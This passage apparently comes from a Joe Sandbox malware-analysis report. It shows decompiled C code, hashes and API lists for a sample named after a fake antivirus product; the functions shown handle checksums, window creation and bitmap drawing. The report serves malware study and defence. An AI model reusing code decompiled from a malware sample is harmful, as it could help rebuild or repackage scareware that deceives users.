>> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                                                                                                              						_t71 = _t71 - 1;
                                                                                                                                                              					} while (_t71 != 0);
                                                                                                                                                              				}
                                                                                                                                                              				_t54 = 0;
                                                                                                                                                              				if(_t74 > 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *(_t54 + _t53) & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                              						_t54 = _t54 + 1;
                                                                                                                                                              					} while (_t54 < _t74);
                                                                                                                                                              				}
                                                                                                                                                              				return _t28;
                                                                                                                                                              			}









                                                                                                                                                              0x00402ccc
                                                                                                                                                              0x00402cce
                                                                                                                                                              0x00402cce
                                                                                                                                                              0x00402cd3
                                                                                                                                                              0x00402cd7
                                                                                                                                                              0x00402cdc
                                                                                                                                                              0x00402ce1
                                                                                                                                                              0x00402cf5
                                                                                                                                                              0x00402cfc
                                                                                                                                                              0x00402cfd
                                                                                                                                                              0x00402cfd
                                                                                                                                                              0x00402d03
                                                                                                                                                              0x00402d07
                                                                                                                                                              0x00402d0a
                                                                                                                                                              0x00402d0a
                                                                                                                                                              0x00402d0c
                                                                                                                                                              0x00402d1c
                                                                                                                                                              0x00402d7a
                                                                                                                                                              0x00402d81
                                                                                                                                                              0x00402d81
                                                                                                                                                              0x00402d0a
                                                                                                                                                              0x00402d84
                                                                                                                                                              0x00402d88
                                                                                                                                                              0x00402d8b
                                                                                                                                                              0x00402d97
                                                                                                                                                              0x00402d9e
                                                                                                                                                              0x00402d9f
                                                                                                                                                              0x00402da3
                                                                                                                                                              0x00402da6

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                              • Instruction ID: 0cb11850dc2377cddf84538798f7ae426082b721ee3b3fe272e98e9b9c12c88d
                                                                                                                                                              • Opcode Fuzzy Hash: f0356b928a5c8748b773292bb5a3f3348234b7994c9787135c7941ce81f34bb9
                                                                                                                                                              • Instruction Fuzzy Hash: D621F6318340B16AC344EAA9FD8C57737D2EBD3306759867AD780932D4C23CA952D778
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E00406D54(void* __ecx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				struct tagPOINT _v20;
                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                              				long _t41;
                                                                                                                                                              				struct HWND__* _t43;
                                                                                                                                                              				struct HWND__* _t44;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              				CHAR* _t75;
                                                                                                                                                              
                                                                                                                                                              				_t74 = __ecx;
                                                                                                                                                              				if( *((char*)(__ecx + 0x14)) == 0) {
                                                                                                                                                              					__imp__OleInitialize(0);
                                                                                                                                                              					__imp__#17();
                                                                                                                                                              					 *((char*)(__ecx + 0x14)) = 1;
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(_t74 + 0x15)) = 0;
                                                                                                                                                              				ShowWindow(_a8, 0);
                                                                                                                                                              				E00406CED(_t74, _a4);
                                                                                                                                                              				 *((intOrPtr*)(_t74 + 0x10)) = _a12;
                                                                                                                                                              				GetWindowRect(_a8,  &_v20);
                                                                                                                                                              				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
                                                                                                                                                              				_t37 =  *(_t74 + 4);
                                                                                                                                                              				if(_t37 != 0) {
                                                                                                                                                              					DestroyWindow(_t37);
                                                                                                                                                              				}
                                                                                                                                                              				_t38 = GetParent(_a8);
                                                                                                                                                              				_t41 = _v20.x;
                                                                                                                                                              				_t67 = _v12 - _t41;
                                                                                                                                                              				_t43 = CreateWindowExA(0, "RarHtmlClassName", 0, 0x40000000, _t41 + 1, _v20.y, _v12 - _t41, _v8 - _v20.y, _t38, 0,  *_t74, _t74);
                                                                                                                                                              				 *(_t74 + 4) = _t43;
                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                              					ShowWindow(_t43, 5);
                                                                                                                                                              					_t43 = UpdateWindow( *(_t74 + 4));
                                                                                                                                                              				}
                                                                                                                                                              				if( *((char*)(_t74 + 0x15)) == 0) {
                                                                                                                                                              					_t44 =  *(_t74 + 4);
                                                                                                                                                              					if(_t44 != 0) {
                                                                                                                                                              						DestroyWindow(_t44);
                                                                                                                                                              						 *(_t74 + 4) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					ShowWindow(_a8, 5);
                                                                                                                                                              					_t61 = E0040A1EC(0x100 + E0040A384(_t67, _a12) * 6);
                                                                                                                                                              					E0040A477(_t49, _a12);
                                                                                                                                                              					if(E004065B9(_t61) == 0) {
                                                                                                                                                              						E004065E9(_t74, _t61);
                                                                                                                                                              					}
                                                                                                                                                              					_t75 = E00406A19(_t74, _t61);
                                                                                                                                                              					_t43 = E0040A205(_t61);
                                                                                                                                                              					if(_t75 != 0) {
                                                                                                                                                              						SetWindowTextA(_a8, _t75);
                                                                                                                                                              						return E0040A205(_t75);
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *((intOrPtr*)(_t74 + 0x18)) > 0x64) {
                                                                                                                                                              						return E004066B3(_t74);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t43;
                                                                                                                                                              			}













                                                                                                                                                              0x00406d5c
                                                                                                                                                              0x00406d63
                                                                                                                                                              0x00406d67
                                                                                                                                                              0x00406d6d
                                                                                                                                                              0x00406d73
                                                                                                                                                              0x00406d73
                                                                                                                                                              0x00406d82
                                                                                                                                                              0x00406d86
                                                                                                                                                              0x00406d8d
                                                                                                                                                              0x00406d95
                                                                                                                                                              0x00406d9f
                                                                                                                                                              0x00406db9
                                                                                                                                                              0x00406dbf
                                                                                                                                                              0x00406dc4
                                                                                                                                                              0x00406dc7
                                                                                                                                                              0x00406dc7
                                                                                                                                                              0x00406dd5
                                                                                                                                                              0x00406de4
                                                                                                                                                              0x00406dea
                                                                                                                                                              0x00406dfd
                                                                                                                                                              0x00406e03
                                                                                                                                                              0x00406e08
                                                                                                                                                              0x00406e0d
                                                                                                                                                              0x00406e12
                                                                                                                                                              0x00406e12
                                                                                                                                                              0x00406e1c
                                                                                                                                                              0x00406e2d
                                                                                                                                                              0x00406e32
                                                                                                                                                              0x00406e35
                                                                                                                                                              0x00406e3b
                                                                                                                                                              0x00406e3b
                                                                                                                                                              0x00406e43
                                                                                                                                                              0x00406e5e
                                                                                                                                                              0x00406e61
                                                                                                                                                              0x00406e70
                                                                                                                                                              0x00406e75
                                                                                                                                                              0x00406e75
                                                                                                                                                              0x00406e83
                                                                                                                                                              0x00406e85
                                                                                                                                                              0x00406e8c
                                                                                                                                                              0x00406e92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406e99
                                                                                                                                                              0x00406e1e
                                                                                                                                                              0x00406e22
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406e26
                                                                                                                                                              0x00406e22
                                                                                                                                                              0x00406ea2

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Show$DestroyParent$CreateInitializePointsRectTextUpdate
                                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                                              • API String ID: 2853670363-1658105358
                                                                                                                                                              • Opcode ID: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                              • Instruction ID: a00efe7b2d33d11f981a855a221e61759c6655e01f9ee02c7d4733981d41992d
                                                                                                                                                              • Opcode Fuzzy Hash: 847cbe9744d6f9c96df690b184ecb2e54258959ff2f53691c322438f891e790a
                                                                                                                                                              • Instruction Fuzzy Hash: DE41C570600704BFDB21AF65DD49FAF7BA9EF44700F01852AF856E2291CB789920CB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E0040ABDC(void* _a4, signed int _a8, int _a12) {
                                                                                                                                                              				struct HDC__* _v8;
                                                                                                                                                              				struct HDC__* _v12;
                                                                                                                                                              				struct HBITMAP__* _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				void _v44;
                                                                                                                                                              				struct HDC__* _t36;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				struct HDC__* _t54;
                                                                                                                                                              
                                                                                                                                                              				_t36 = GetDC(0);
                                                                                                                                                              				_v12 = _t36;
                                                                                                                                                              				_t54 = CreateCompatibleDC(_t36);
                                                                                                                                                              				_v8 = CreateCompatibleDC(_v12);
                                                                                                                                                              				GetObjectA(_a4, 0x18,  &_v44);
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t43 = _v36 * _a8 / _v40;
                                                                                                                                                              				if(_t43 < _a12) {
                                                                                                                                                              					_a12 = _t43;
                                                                                                                                                              				}
                                                                                                                                                              				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                                                                                              				_a4 = SelectObject(_t54, _a4);
                                                                                                                                                              				_v20 = SelectObject(_v8, _v16);
                                                                                                                                                              				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                                                                                              				SelectObject(_t54, _a4);
                                                                                                                                                              				SelectObject(_v8, _v20);
                                                                                                                                                              				DeleteDC(_t54);
                                                                                                                                                              				DeleteDC(_v8);
                                                                                                                                                              				ReleaseDC(0, _v12);
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}













                                                                                                                                                              0x0040abe8
                                                                                                                                                              0x0040abf5
                                                                                                                                                              0x0040abfd
                                                                                                                                                              0x0040ac01
                                                                                                                                                              0x0040ac0d
                                                                                                                                                              0x0040ac1a
                                                                                                                                                              0x0040ac1b
                                                                                                                                                              0x0040ac21
                                                                                                                                                              0x0040ac23
                                                                                                                                                              0x0040ac23
                                                                                                                                                              0x0040ac3f
                                                                                                                                                              0x0040ac47
                                                                                                                                                              0x0040ac57
                                                                                                                                                              0x0040ac6b
                                                                                                                                                              0x0040ac75
                                                                                                                                                              0x0040ac7d
                                                                                                                                                              0x0040ac86
                                                                                                                                                              0x0040ac8b
                                                                                                                                                              0x0040ac91
                                                                                                                                                              0x0040ac9e

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040ABE8
                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0040ABF8
                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 0040ABFF
                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0040AC0D
                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC2F
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0040AC42
                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0040AC4D
                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC6B
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0040AC75
                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0040AC7D
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0040AC86
                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0040AC8B
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040AC91
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3950507155-0
                                                                                                                                                              • Opcode ID: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                              • Instruction ID: 49fe361b3f63de033719242860511c57cf4e76dfbbd86f1750afdf69dbc3ac75
                                                                                                                                                              • Opcode Fuzzy Hash: 629bea9404d9b5a6bf81915325d9dfd7339313f3d0e0db77c6006f5bcc1e4a8d
                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A276800258FFCF119FA1DD48CDEBFBAFB49350B108466FA14A2120C7759A60EFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040BA36(void* __edx, void* __eflags, signed int _a4) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				void _v32;
                                                                                                                                                              				char _v1056;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				struct HWND__* _t15;
                                                                                                                                                              				int _t25;
                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              
                                                                                                                                                              				_t14 = E0040AD27(__eflags);
                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                              					return _t14;
                                                                                                                                                              				}
                                                                                                                                                              				_t15 = GetWindow(_a4, 5);
                                                                                                                                                              				_a4 = _a4 & 0x00000000;
                                                                                                                                                              				_t35 = _t15;
                                                                                                                                                              				_v8 = _t35;
                                                                                                                                                              				if(_t35 == 0) {
                                                                                                                                                              					L12:
                                                                                                                                                              					return _t15;
                                                                                                                                                              				} else {
                                                                                                                                                              					while(_a4 < 0x200) {
                                                                                                                                                              						GetClassNameA(_t35,  &_v1056, 0x400);
